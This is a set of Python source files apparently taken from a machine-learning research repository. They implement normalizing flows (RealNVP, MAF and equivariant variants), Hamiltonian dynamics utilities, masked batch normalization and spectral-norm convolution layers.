import torch.nn.functional as F
from torch.distributions import Normal
from torch import distributions
from torch.nn.parameter import Parameter
import ipdb
from sklearn import cluster, datasets, mixture
from sklearn.preprocessing import StandardScaler
from flows.flow_helpers import *
from nflows.flows.base import Flow
from nflows.distributions.normal import StandardNormal
from nflows.transforms.base import CompositeTransform
from nflows.transforms.autoregressive import MaskedAffineAutoregressiveTransform
from nflows.transforms.permutations import ReversePermutation
from nflows.flows import realnvp
from e2cnn import gspaces
from e2cnn import nn as enn
import flows.layers.base as base_layers
import flows.layers as layers
ACTIVATION_FNS = {
'relu': torch.nn.ReLU,
'tanh': torch.nn.Tanh,
'elu': torch.nn.ELU,
'selu': torch.nn.SELU,
'fullsort': base_layers.FullSort,
'maxmin': base_layers.MaxMin,
'swish': base_layers.Swish,
'lcube': base_layers.LipschitzCube,
}
GROUPS = {
'fliprot16': gspaces.FlipRot2dOnR2(N=16),
'fliprot12': gspaces.FlipRot2dOnR2(N=12),
'fliprot8': gspaces.FlipRot2dOnR2(N=8),
'fliprot4': gspaces.FlipRot2dOnR2(N=4),
'fliprot2': gspaces.FlipRot2dOnR2(N=2),
'flip': gspaces.Flip2dOnR2(),
'rot16': gspaces.Rot2dOnR2(N=16),
'rot12': gspaces.Rot2dOnR2(N=12),
'rot8': gspaces.Rot2dOnR2(N=8),
'rot4': gspaces.Rot2dOnR2(N=4),
'rot2': gspaces.Rot2dOnR2(N=2),
'so2': gspaces.Rot2dOnR2(N=-1, maximum_frequency=10),
'o2': gspaces.FlipRot2dOnR2(N=-1, maximum_frequency=10),
}
def standard_normal_logprob(z):
logZ = -0.5 * math.log(2 * math.pi)
return logZ - z.pow(2) / 2
def add_padding(args, x, nvals=256):
# Theoretically, padding should've been added before the add_noise preprocessing.
# nvals takes into account the preprocessing before padding is added.
if args.padding > 0:
if args.padding_dist == 'uniform':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).uniform_()
logpu = torch.zeros_like(u).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
elif args.padding_dist == 'gaussian':
u = x.new_empty(x.shape[0], args.padding, x.shape[2], x.shape[3]).normal_(nvals / 2, nvals / 8)
logpu = normal_logprob(u, nvals / 2, math.log(nvals / 8)).sum([1, 2, 3]).view(-1, 1)
return torch.cat([x, u / nvals], dim=1), logpu
else:
raise ValueError()
elif args.double_padding:
x = x.repeat(1, 2, 1, 1)
return x, torch.zeros(x.shape[0], 1).to(x)
else:
return x, torch.zeros(x.shape[0], 1).to(x)
#Reference: https://github.com/ritheshkumar95/pytorch-normalizing-flows/blob/master/modules.py
LOG_SIG_MAX = 2
LOG_SIG_MIN = -20
epsilon = 1e-6
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
def weights_init_(m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
torch.nn.init.xavier_uniform_(m.weight, gain=1)
torch.nn.init.constant_(m.bias, 0)
def toy_flow(args, n_blocks, input_dim, hidden_dim, num_layers):
base_dist = StandardNormal(shape=[input_dim])
transforms = []
for _ in range(num_layers):
transforms.append(ReversePermutation(features=input_dim))
transforms.append(MaskedAffineAutoregressiveTransform(features=input_dim,
hidden_features=hidden_dim))
transform = CompositeTransform(transforms)
flow = Flow(transform, base_dist)
return flow
def package_realnvp(args, n_blocks, input_dim, hidden_dim, num_layers):
flow = realnvp.SimpleRealNVP(features=input_dim,
hidden_features=hidden_dim,
num_layers=num_layers,
num_blocks_per_layer=n_blocks)
return flow
# All code below this line is taken from
# https://github.com/kamenbliznashki/normalizing_flows/blob/master/maf.py
## Taken from: https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb
class FlowSequential(nn.Sequential):
""" Container for layers of a normalizing flow """
def forward(self, x, y):
sum_log_abs_det_jacobians = 0
i = len(self)
for module in self:
x, log_abs_det_jacobian = module(x, y)
sum_log_abs_det_jacobians = sum_log_abs_det_jacobians + log_abs_det_jacobian
i -= 1
return x, sum_log_abs_det_jacobians
def inverse(self, u, y):
i = 0
sum_log_abs_det_jacobians = 0
for module in reversed(self):
u, log_abs_det_jacobian = module.inverse(u, y)
sum_log_abs_det_jacobians = sum_log_abs_det_jacobians + log_abs_det_jacobian
i += 1
return u, sum_log_abs_det_jacobians
# --------------------
# Models
# --------------------
class MAFRealNVP(nn.Module):
def __init__(self, args, n_blocks, input_size, hidden_size, n_hidden,
radius=torch.Tensor([0]), cond_label_size=None, batch_norm=False):
super().__init__()
# base distribution for calculation of log prob under the model
self.register_buffer('base_dist_mean', torch.zeros(input_size))
self.register_buffer('base_dist_var', torch.ones(input_size))
self.p_z = StandardNormal
self.radius = radius
# construct model
modules = []
mask = torch.arange(input_size).float() % 2
for i in range(n_blocks):
modules += [LinearMaskedCoupling(input_size, hidden_size, n_hidden, mask, cond_label_size)]
mask = 1 - mask
# modules += batch_norm * [BatchNorm(input_size)]
self.net = FlowSequential(*modules)
@property
def base_dist(self):
return D.Normal(self.base_dist_mean, self.base_dist_var)
def forward(self, x, y=None):
return self.net(x, y)
def inverse(self, u, y=None):
return self.net.inverse(u, y)
def log_prob(self, inputs, y=None):
u, sum_log_abs_det_jacobians = self.forward(inputs, y)
return torch.sum(self.base_dist.log_prob(u) + sum_log_abs_det_jacobians, dim=1)
## Taken from: https://github.com/senya-ashukha/real-nvp-pytorch/blob/master/real-nvp-pytorch.ipynb
class RealNVP(nn.Module):
def __init__(self, args, n_blocks, input_size, hidden_size, n_hidden,
layer_type='Conv'):
super(RealNVP, self).__init__()
_, self.c, self.h, self.w = input_size[:]
# mask_size = self.c * self.h * self.w
# mask = torch.arange(mask_size).float() % 2
self.group_action_type = GROUPS[args.group]
self.out_fiber = args.out_fiber
self.field_type = args.field_type
self.group_card = len(list(self.group_action_type.testing_elements))
self.input_type = enn.FieldType(self.group_action_type, self.c*[self.group_action_type.trivial_repr])
self.n_blocks = int(n_blocks)
self.n_hidden = n_hidden
self.layer_type = layer_type
checkerboard = [[((i % 2) + j) % 2 for j in range(self.w)] for i in range(self.h)]
mask = torch.tensor(checkerboard).float()
# Reshape to (1, 1, height, width) for broadcasting with tensors of shape (B, C, H, W)
mask = mask.view(1, 1, self.h, self.w)
self.dev = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
i_mask = 1 - mask
mask = torch.vstack([mask,i_mask]).repeat(int(self.n_blocks/2), 1, 1, 1)
self.p_z = StandardNormal
self.s, self.t = create_real_nvp_blocks(self.c, hidden_size,
self.n_blocks, n_hidden, layer_type)
self.mask = nn.Parameter(mask, requires_grad=False)
def inverse(self, z, logpz=None):
z = z.view(-1, self.c, self.h, self.w)
log_det_J, x = z.new_zeros(z.shape[0]), z
for i in range(0,self.n_blocks):
x_ = x*self.mask[i]
s = self.s[i](x_)
t = self.t[i](x_)
x = x_ + (1 - self.mask[i]) * (x * torch.exp(s) + t)
log_det_J += ((1-self.mask[i])*s).sum(dim=(1,2,3)) # log det dx/du
return x.squeeze() if logpz is None else (z, -1*log_det_J.view(-1,1))
def forward(self, x, inverse=False):
if inverse:
return self.inverse(x)
log_det_J, z = x.new_zeros(x.shape[0]), x
for i in reversed(range(0,self.n_blocks)):
z_ = self.mask[i] * z
s = self.s[i](z_)
t = self.t[i](z_)
z = (1 - self.mask[i]) * (z - t) * torch.exp(-s) + z_
log_det_J -= ((1-self.mask[i])*s).sum(dim=(1,2,3))
return z.squeeze(), log_det_J.view(-1, 1)
def log_prob(self, inputs, beta=1.):
z, delta_logp = self.forward(inputs)
logpz = standard_normal_logprob(z).view(z.size(0), -1).sum(1, keepdim=True)
logpx = logpz - beta * delta_logp
return logpx, logpz, -1*delta_logp
# p_z = self.p_z([inputs.shape[-1]])
# return p_z.log_prob(z) + logp
def compute_avg_test_loss(self, args, r2_act, data, beta=1.):
_, c, h, w = data.shape
input_type = enn.FieldType(r2_act, self.c*[r2_act.trivial_repr])
bits_per_dim, logits_tensor = torch.zeros(1).to(data), torch.zeros(args.n_classes).to(data)
logpz, delta_logp = torch.zeros(1).to(data), torch.zeros(1).to(data)
logpx_list = []
data = enn.GeometricTensor(data.cpu(), self.input_type)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
for g in r2_act.testing_elements:
x_transformed = data.transform(g).tensor.view(-1, c, h, w).cuda()
padded_inputs, logpu = add_padding(args, x_transformed, nvals)
_, logpz, delta_logp = self.log_prob(padded_inputs)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
logpx_list.append(logpx)
logpx_total = torch.vstack(logpx_list)
bits_per_dim = -torch.mean(logpx_total) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
return bits_per_dim
def compute_loss(self, args, inputs, beta=1., do_test=False):
if do_test:
return self.compute_avg_test_loss(args, self.group_action_type, inputs)
bits_per_dim, logits_tensor = torch.zeros(1).to(inputs), torch.zeros(args.n_classes).to(inputs)
logpz, delta_logp = torch.zeros(1).to(inputs), torch.zeros(1).to(inputs)
if args.dataset == 'celeba_5bit':
nvals = 32
elif args.dataset == 'celebahq':
nvals = 2**args.nbits
else:
nvals = 256
padded_inputs, logpu = add_padding(args, inputs, nvals)
_, logpz, delta_logp = self.log_prob(padded_inputs, beta)
# log p(x)
logpx = logpz - beta * delta_logp - np.log(nvals) * (
args.imagesize * args.imagesize * (args.im_dim + args.padding)
) - logpu
bits_per_dim = -torch.mean(logpx) / (args.imagesize *
args.imagesize * args.im_dim) / np.log(2)
logpz = torch.mean(logpz).detach()
delta_logp = torch.mean(-delta_logp).detach()
return bits_per_dim, logits_tensor, logpz, delta_logp, _
def sample(self, batchSize):
# TODO: Update this method for edge_index
z = self.prior.sample((batchSize, 1))
logp = self.prior.log_prob(z)
x = self.inverse(z)
return x
```
#### File: Equivariant-Discrete-Flows/flows/__init__.py
```python
from typing import Any
from .flows import *
from .equivariant_flows import *
from .toy_resflow import *
from .resflow import *
from .equivariant_resflow import *
from .lie_resflow import *
from .mixed_equivariant_resflow import *
from .invariant_maps import *
import argparse
import ipdb
kwargs_flows = {'MAFRealNVP': MAFRealNVP, 'RealNVP': RealNVP, "Toy": toy_flow,
"Simple":package_realnvp, "toy_resflow": ToyResFlow, "resflow":
ResidualFlow, "E_realnvp": EquivariantRealNVP, "FiberRealNVP":
FiberRealNVP, "E_toy_resflow": EquivariantToyResFlow,
"resflow": ResidualFlow, "E_resflow": EquivariantResidualFlow,
"Mixed_resflow": MixedResidualFlow, "lie_resflow":
LieResidualFlow, "E_convexp": EquivariantConvExp}
def create_flow(arg_parse: argparse.Namespace, model_type: str, *args: Any, **kwargs: Any):
if arg_parse.dataset in ["8gaussians", "2spirals", "checkerboard", "rings",
"pinwheel", "swissroll", "circles", "line", "cos",
"dw4"]:
flow_model = kwargs_flows[model_type](arg_parse, int(arg_parse.n_blocks),
arg_parse.input_size,
arg_parse.hidden_dim,
arg_parse.num_layers).to(arg_parse.dev)
elif 'resflow' not in model_type:
flow_model = kwargs_flows[model_type](arg_parse, arg_parse.n_blocks,
arg_parse.input_size,
arg_parse.hidden_dim,
arg_parse.num_layers).to(arg_parse.dev)
else:
flow_model = kwargs_flows[model_type](
arg_parse,
input_size=arg_parse.input_size,
n_blocks=list(map(int, arg_parse.n_blocks.split('-'))),
intermediate_dim=arg_parse.idim,
factor_out=arg_parse.factor_out,
quadratic=arg_parse.quadratic,
init_layer=arg_parse.init_layer,
actnorm=arg_parse.actnorm,
fc_actnorm=arg_parse.fc_actnorm,
batchnorm=arg_parse.batchnorm,
dropout=arg_parse.dropout,
fc=arg_parse.fc,
coeff=arg_parse.coeff,
vnorms=arg_parse.vnorms,
n_lipschitz_iters=arg_parse.n_lipschitz_iters,
sn_atol=arg_parse.sn_tol,
sn_rtol=arg_parse.sn_tol,
n_power_series=arg_parse.n_power_series,
n_dist=arg_parse.n_dist,
n_samples=arg_parse.n_samples,
kernels=arg_parse.kernels,
activation_fn=arg_parse.act,
fc_end=arg_parse.fc_end,
fc_idim=arg_parse.fc_idim,
n_exact_terms=arg_parse.n_exact_terms,
preact=arg_parse.preact,
neumann_grad=arg_parse.neumann_grad,
grad_in_forward=arg_parse.mem_eff,
first_resblock=arg_parse.first_resblock,
learn_p=arg_parse.learn_p,
classification=arg_parse.task in ['classification', 'hybrid'],
classification_hdim=arg_parse.cdim,
n_classes=arg_parse.n_classes,
block_type=arg_parse.block,
).to(arg_parse.dev)
return flow_model
```
#### File: base/lie_conv/hamiltonian.py
```python
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
import matplotlib.animation as animation
class HamiltonianDynamics(nn.Module):
""" Defines the dynamics given a hamiltonian. If wgrad=True, the dynamics can be backproped."""
def __init__(self,H,wgrad=False):
super().__init__()
self.H = H
self.wgrad=wgrad
self.nfe=0
def forward(self,t,z):
self.nfe+=1
with torch.enable_grad():
z = torch.zeros_like(z, requires_grad=True) + z
D = z.shape[-1]
h = self.H(t,z).sum() # elements in mb are independent, gives mb gradients
rg = torch.autograd.grad(h,z,create_graph=self.wgrad)[0] # riemannian gradient
sg = torch.cat([rg[:,D//2:],-rg[:,:D//2]],dim=-1) # symplectic gradient = SdH
return sg
def EuclideanK(momentums, masses):
""" Shape (bs,n,d), and (bs,n),
standard \sum_n p_n^2/{2m_n} kinetic energy"""
p_sq_norms = momentums.pow(2).sum(-1)
kinetic_energy = (p_sq_norms / masses).sum(-1) / 2
return kinetic_energy
# return (p*(p/m[:,:,None])).sum(-1).sum(-1)/2
def KeplerV(positions, masses):
""" Shape (bs,n,d), and (bs,n),
Gravitational PE: -\sum_{jk} m_jm_k/{\|q_j-q_k\|}"""
grav_const = 1
n = masses.shape[-1]
row_ind, col_ind = torch.tril_indices(n, n, offset=-1)
moments = (masses.unsqueeze(1) * masses.unsqueeze(2))[:, row_ind, col_ind]
pair_diff = (positions.unsqueeze(1) - positions.unsqueeze(2))[:, row_ind, col_ind]
pair_dist = pair_diff.norm(dim=-1) + 1e-8
potential_energy = -grav_const * (moments / pair_dist).sum(-1)
return potential_energy
def KeplerH(z,m):
""" with shapes (bs,2nd)"""
bs, D = z.shape # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
potential_energy = KeplerV(q, m)
kinetic_energy = EuclideanK(p, m)
assert potential_energy.shape[0] == bs
assert kinetic_energy.shape[0] == bs
return potential_energy + kinetic_energy
def SpringV(q,k):
""" Potential for a bunch particles connected by springs with kij
Shape (bs,n,d), and (bs,n,n)"""
K = k[:,:,None]*k[:,None,:] #(bs,n,n)
n = K.shape[-1]
radial = (q[:,:,None,:] - q[:,None,:,:]).norm(dim=-1)**2 # (bs, n, n)
potential = .5*(K*radial).sum(-1).sum(-1)
return potential #(bs,n,n) -> (bs)
def SpringH(z,m,k):
""" with shapes (bs,2nd)"""
D = z.shape[-1] # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
return EuclideanK(p,m) + SpringV(q,k)
def BallV(q,r):
""" Potential for a bunch of (almost) rigid balls and walls, each ball has radius r"""
n = r.shape[-1]
thresh = 0.1
barrier = lambda dist: .5*(torch.exp(1/(dist-thresh*1.05) - 50*(dist-thresh))).sum(-1)#50*((dist-thresh)**2).sum(-1)#.5*(torch.exp(1/(dist-thresh*1.05))/dist).sum(-1)#1/(dist-thresh*1.05)
separation = (q[:,:,None,:] - q[:,None,:,:]).norm(dim=-1)
sum_r = r[:,:,None]+r[:,None,:]
touching = (separation-sum_r < thresh)
energy = barrier(separation[touching]-sum_r[touching])
for i in range(q.shape[-1]):
ld = q[:,:,i]+1-r
rd = 1-q[:,:,i]-r
energy += barrier(ld[ld<thresh])+barrier(rd[rd<thresh])
return energy
def BallH(z,m,r):
D = z.shape[-1] # of ODE dims, 2*num_particles*space_dim
q = z[:,:D//2].reshape(*m.shape,-1)
p = z[:,D//2:].reshape(*m.shape,-1)
return EuclideanK(p,m) + BallV(q,r)
# TODO:
# Make animation plots look nicer. Why are there leftover points on the trails?
class Animation2d(object):
def __init__(self, qt, ms=None, box_lim=(-1, 1)):
if ms is None: ms = len(qt)*[6]
self.qt = qt
self.fig = plt.figure()
self.ax = self.fig.add_axes([0, 0, 1, 1])#axes(projection='3d')
self.ax.set_xlim(box_lim)
self.ax.set_ylim(box_lim)
self.lines = sum([self.ax.plot([],[],'-') for particle in self.qt],[])
self.pts = sum([self.ax.plot([],[],'o',ms=ms[i]) for i in range(len(self.qt))],[])
def init(self):
for line,pt in zip(self.lines,self.pts):
line.set_data([], [])
pt.set_data([], [])
return self.lines + self.pts
def update(self,i=0):
for line, pt, trajectory in zip(self.lines,self.pts,self.qt):
x,y = trajectory[:,:i]
line.set_data(x,y)
pt.set_data(x[-1:], y[-1:])
#self.fig.clear()
self.fig.canvas.draw()
return self.lines+self.pts
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[-1],
interval=33,init_func=self.init,blit=True)
class Animation3d(object):
def __init__(self,qt,ms=None, box_lim=(-1, 1)):
if ms is None: ms = len(qt)*[6]
self.qt = qt
self.fig = plt.figure()
self.ax = self.fig.add_axes([0, 0, 1, 1],projection='3d')#axes(projection='3d')
self.ax.set_xlim3d(box_lim)
self.ax.set_ylim3d(box_lim)
self.ax.set_zlim3d(box_lim)
self.lines = sum([self.ax.plot([],[],[],'-') for _ in self.qt],[])
self.pts = sum([self.ax.plot([],[],[],'o',ms=ms[i]) for i in range(len(self.qt))],[])
def init(self):
for line,pt in zip(self.lines,self.pts):
line.set_data([], [])
line.set_3d_properties([])
pt.set_data([], [])
pt.set_3d_properties([])
return self.lines + self.pts
def update(self,i=0):
for line, pt, trajectory in zip(self.lines,self.pts,self.qt):
x,y,z = trajectory[:,:i]
line.set_data(x,y)
line.set_3d_properties(z)
pt.set_data(x[-1:], y[-1:])
pt.set_3d_properties(z[-1:])
#self.fig.clear()
self.fig.canvas.draw()
return self.lines+self.pts
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[-1],
interval=33,init_func=self.init,blit=True)
def AnimationNd(n):
if n==2: return Animation2d
elif n==3: return Animation3d
else: assert False, "No animation for d={}".format(n)
```
#### File: base/lie_conv/masked_batchnorm.py
```python
import torch
import torch.nn as nn
class MaskBatchNormNd(nn.BatchNorm1d):
""" n-dimensional batchnorm that excludes points outside the mask from the statistics"""
def forward(self, inp):
"""input _, (*, c), (*,) computes statistics averaging over * within the mask"""
coords,x,mask = inp
sum_dims = list(range(len(x.shape[:-1])))
x_or_zero = torch.where(mask.unsqueeze(-1),x,torch.zeros_like(x)) #remove nans
if self.training or not self.track_running_stats:
xsum = x_or_zero.sum(dim=sum_dims)
xxsum = (x_or_zero*x_or_zero).sum(dim=sum_dims)
numel_notnan = (mask).sum()
xmean = xsum / numel_notnan
sumvar = xxsum - xsum * xmean
unbias_var = sumvar / (numel_notnan - 1)
bias_var = sumvar / numel_notnan
self.running_mean = (
(1 - self.momentum) * self.running_mean
+ self.momentum * xmean.detach())
self.running_var = (
(1 - self.momentum) * self.running_var
+ self.momentum * unbias_var.detach())
else:
xmean, bias_var = self.running_mean,self.running_var
std = bias_var.clamp(self.eps) ** 0.5
ratio = self.weight/std
output = (x_or_zero*ratio + (self.bias - xmean*ratio))
return (coords,output,mask)
```
#### File: base/lie_conv/moleculeTrainer.py
```python
import torch
import torch.nn as nn
from oil.model_trainers import Trainer
from lie_conv.lieConv import PointConv, Pass, Swish, GlobalPool
from lie_conv.lieConv import norm, LieResNet, BottleBlock
from lie_conv.utils import export, Named
from lie_conv.datasets import SO3aug, SE3aug
from lie_conv.lieGroups import SE3
import numpy as np
@export
class MoleculeTrainer(Trainer):
def __init__(self, *args, task='cv', ds_stats=None, **kwargs):
super().__init__(*args,**kwargs)
self.hypers['task'] = task
self.ds_stats = ds_stats
if hasattr(self.lr_schedulers[0],'setup_metrics'): #setup lr_plateau if exists
self.lr_schedulers[0].setup_metrics(self.logger,'valid_MAE')
def loss(self, minibatch):
y = self.model(minibatch)
target = minibatch[self.hypers['task']]
if self.ds_stats is not None:
median, mad = self.ds_stats
target = (target - median) / mad
return (y-target).abs().mean()
def metrics(self, loader):
task = self.hypers['task']
#mse = lambda mb: ((self.model(mb)-mb[task])**2).mean().cpu().data.numpy()
if self.ds_stats is not None:
median, mad = self.ds_stats
def mae(mb):
target = mb[task]
y = self.model(mb) * mad + median
return (y-target).abs().mean().cpu().data.numpy()
else:
mae = lambda mb: (self.model(mb)-mb[task]).abs().mean().cpu().data.numpy()
return {'MAE': self.evalAverageMetrics(loader,mae)}
def logStuff(self,step,minibatch=None):
super().logStuff(step,minibatch)
@export
class MolecLieResNet(LieResNet):
def __init__(self, num_species, charge_scale, aug=False, group=SE3, **kwargs):
super().__init__(chin=3*num_species,num_outputs=1,group=group,ds_frac=1,**kwargs)
self.charge_scale = charge_scale
self.aug =aug
self.random_rotate = SE3aug()#RandomRotation()
def featurize(self, mb):
charges = mb['charges'] / self.charge_scale
c_vec = torch.stack([torch.ones_like(charges),charges,charges**2],dim=-1) #
one_hot_charges = (mb['one_hot'][:,:,:,None]*c_vec[:,:,None,:]).float().reshape(*charges.shape,-1)
atomic_coords = mb['positions'].float()
atom_mask = mb['charges']>0
#print('orig_mask',atom_mask[0].sum())
return (atomic_coords, one_hot_charges, atom_mask)
def forward(self,mb):
with torch.no_grad():
x = self.featurize(mb)
x = self.random_rotate(x) if self.aug else x
return super().forward(x).squeeze(-1)
```
#### File: layers/base/spectral.py
```python
import torch
import torch.nn.functional as F
class SpectralNormConv(object):
# Invariant before and after each forward call:
# u = normalize(W @ v)
# NB: At initialization, this invariant is not enforced
_version = 1
# At version 1:
# made `W` not a buffer,
# added `v` as a buffer, and
# made eval mode use `W = u @ W_orig @ v` rather than the stored `W`.
def __init__(self, coeff, input_dim, name='weight', n_power_iterations=1,
eps=1e-12):
self.coeff = coeff
self.input_dim = input_dim
self.name = name
if n_power_iterations <= 0:
raise ValueError('Expected n_power_iterations to be positive, but '
'got n_power_iterations={}'.format(
n_power_iterations))
self.n_power_iterations = n_power_iterations
self.eps = eps
def compute_weight(self, module, do_power_iteration):
# NB: If `do_power_iteration` is set, the `u` and `v` vectors are
# updated in power iteration **in-place**. This is very important
# because in `DataParallel` forward, the vectors (being buffers) are
# broadcast from the parallelized module to each module replica,
# which is a new module object created on the fly. And each replica
# runs its own spectral norm power iteration. So simply assigning
# the updated vectors to the module this function runs on will cause
# the update to be lost forever. And the next time the parallelized
# module is replicated, the same randomly initialized vectors are
# broadcast and used!
#
# Therefore, to make the change propagate back, we rely on two
# important bahaviors (also enforced via tests):
# 1. `DataParallel` doesn't clone storage if the broadcast tensor
# is alreay on correct device; and it makes sure that the
# parallelized module is already on `device[0]`.
# 2. If the out tensor in `out=` kwarg has correct shape, it will
# just fill in the values.
# Therefore, since the same power iteration is performed on all
# devices, simply updating the tensors in-place will make sure that
# the module replica on `device[0]` will update the _u vector on the
# parallized module (by shared storage).
#
# However, after we update `u` and `v` in-place, we need to **clone**
# them before using them to normalize the weight. This is to support
# backproping through two forward passes, e.g., the common pattern in
# GAN training: loss = D(real) - D(fake). Otherwise, engine will
# complain that variables needed to do backward for the first forward
# (i.e., the `u` and `v` vectors) are changed in the second forward.
weight = getattr(module, self.name + '_orig')
u = getattr(module, self.name + '_u')
v = getattr(module, self.name + '_v')
sigma_log = getattr(module, self.name + '_sigma') # for logging
# get settings from conv-module (for transposed convolution)
stride = module.stride
padding = module.padding
if do_power_iteration:
with torch.no_grad():
for _ in range(self.n_power_iterations):
v_s = F.conv_transpose2d(u.view(self.out_shape), weight,
stride=stride,
padding=padding, output_padding=0)
# Note: out flag for in-place changes
v = F.normalize(v_s.view(-1), dim=0, eps=self.eps, out=v)
u_s = F.conv2d(
v.view(self.input_dim), weight, stride=stride,
padding=padding,
bias=None)
u = F.normalize(u_s.view(-1), dim=0, eps=self.eps, out=u)
if self.n_power_iterations > 0:
# See above on why we need to clone
u = u.clone()
v = v.clone()
weight_v = F.conv2d(
v.view(self.input_dim),
weight, stride=stride,
padding=padding,
bias=None)
weight_v = weight_v.view(-1)
sigma = torch.dot(u.view(-1), weight_v)
# enforce spectral norm only as constraint
factorReverse = torch.max(torch.ones(1).to(weight.device),
sigma / self.coeff)
# for logging
weight_v_det = weight_v.detach()
u_det = u.detach()
torch.max(torch.dot(u_det.view(-1), weight_v_det),
torch.dot(u_det.view(-1), weight_v_det), out=sigma_log)
# rescaling
weight = weight / (factorReverse + 1e-5) # for stability
return weight
def remove(self, module):
with torch.no_grad():
weight = self.compute_weight(module, do_power_iteration=False)
delattr(module, self.name)
delattr(module, self.name + '_u')
delattr(module, self.name + '_orig')
module.register_parameter(self.name,
torch.nn.Parameter(weight.detach()))
def __call__(self, module, inputs):
setattr(module, self.name,
self.compute_weight(module, do_power_iteration=module.training))
@staticmethod
def apply(module, coeff, input_dim, name, n_power_iterations, eps):
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, SpectralNormConv) and hook.name == name:
raise RuntimeError("Cannot register two spectral_norm hooks on "
"the same parameter {}".format(name))
fn = SpectralNormConv(coeff, input_dim, name, n_power_iterations, eps)
weight = module._parameters[name]
with torch.no_grad():
num_input_dim = input_dim[0] * input_dim[1] * input_dim[2] * \
input_dim[3]
v = F.normalize(torch.randn(num_input_dim), dim=0, eps=fn.eps)
# get settings from conv-module (for transposed convolution)
stride = module.stride
padding = module.padding
# forward call to infer the shape
u = F.conv2d(
v.view(input_dim), weight, stride=stride,
padding=padding,
bias=None)
fn.out_shape = u.shape
num_output_dim = fn.out_shape[0] * fn.out_shape[1] * fn.out_shape[
2] * fn.out_shape[3]
# overwrite u with random init
u = F.normalize(torch.randn(num_output_dim), dim=0, eps=fn.eps)
delattr(module, fn.name)
module.register_parameter(fn.name + "_orig", weight)
setattr(module, fn.name, weight.data)
module.register_buffer(fn.name + "_u", u)
module.register_buffer(fn.name + "_v", v)
module.register_buffer(fn.name + "_sigma",
torch.ones(1).to(weight.device))
module.register_forward_pre_hook(fn)
module._register_state_dict_hook(SpectralNormConvStateDictHook(fn))
module._register_load_state_dict_pre_hook(
SpectralNormConvLoadStateDictPreHook(fn))
return fn
class SpectralNormConvLoadStateDictPreHook(object):
# See docstring of SpectralNorm._version on the changes to spectral_norm.
def __init__(self, fn):
self.fn = fn
# For state_dict with version None, (assuming that it has gone through at
# least one training forward), we have
#
# u = normalize(W_orig @ v)
# W = W_orig / sigma, where sigma = u @ W_orig @ v
#
# To compute `v`, we solve `W_orig @ x = u`, and let
# v = x / (u @ W_orig @ x) * (W / W_orig).
def __call__(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
fn = self.fn
version = local_metadata.get('spectral_norm_conv', {}).get(
fn.name + '.version', None)
if version is None or version < 1:
with torch.no_grad():
weight_orig = state_dict[prefix + fn.name + '_orig']
weight = state_dict.pop(prefix + fn.name)
sigma = (weight_orig / weight).mean()
weight_mat = fn.reshape_weight_to_matrix(weight_orig)
u = state_dict[prefix + fn.name + '_u']
class SpectralNormConvStateDictHook(object):
# See docstring of SpectralNorm._version on the changes to spectral_norm.
def __init__(self, fn):
self.fn = fn
def __call__(self, module, state_dict, prefix, local_metadata):
if 'spectral_norm_conv' not in local_metadata:
local_metadata['spectral_norm_conv'] = {}
key = self.fn.name + '.version'
if key in local_metadata['spectral_norm_conv']:
raise RuntimeError(
"Unexpected key in metadata['spectral_norm_conv']: {}".format(
key))
local_metadata['spectral_norm_conv'][key] = self.fn._version
def spectral_norm_conv(module, coeff, input_dim, name='weight',
n_power_iterations=1, eps=1e-12):
r"""Applies spectral normalization to a parameter in the given module.
.. math::
\mathbf{W} = \dfrac{\mathbf{W}}{\sigma(\mathbf{W})} \\
\sigma(\mathbf{W}) = \max_{\mathbf{h}: \mathbf{h} \ne 0} \dfrac{\|\mathbf{W} \mathbf{h}\|_2}{\|\mathbf{h}\|_2}
Spectral normalization stabilizes the training of discriminators (critics)
in Generaive Adversarial Networks (GANs) by rescaling the weight tensor
with spectral norm :math:`\sigma` of the weight matrix calculated using
power iteration method. If the dimension of the weight tensor is greater
than 2, it is reshaped to 2D in power iteration method to get spectral
norm. This is implemented via a hook that calculates spectral norm and
rescales weight before every :meth:`~Module.forward` call.
See `Spectral Normalization for Generative Adversarial Networks`_ .
.. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
n_power_iterations (int, optional): number of power iterations to
calculate spectal norm
eps (float, optional): epsilon for numerical stability in
calculating norms
dim (int, optional): dimension corresponding to number of outputs,
the default is 0, except for modules that are instances of
ConvTranspose1/2/3d, when it is 1
Returns:
The original module with the spectal norm hook
Example::
>>> m = spectral_norm(nn.Linear(20, 40))
Linear (20 -> 40)
>>> m.weight_u.size()
torch.Size([20])
"""
input_dim_4d = (1, input_dim[0], input_dim[1], input_dim[2])
SpectralNormConv.apply(module, coeff, input_dim_4d, name,
n_power_iterations, eps)
return module
def remove_spectral_norm_conv(module, name='weight'):
r"""Removes the spectral normalization reparameterization from a module.
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
Example:
>>> m = spectral_norm(nn.Linear(40, 10))
>>> remove_spectral_norm(m)
"""
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, SpectralNormConv) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("spectral_norm of '{}' not found in {}".format(
name, module))
``` |
{
"source": "joeybose/FloRL",
"score": 2
} |
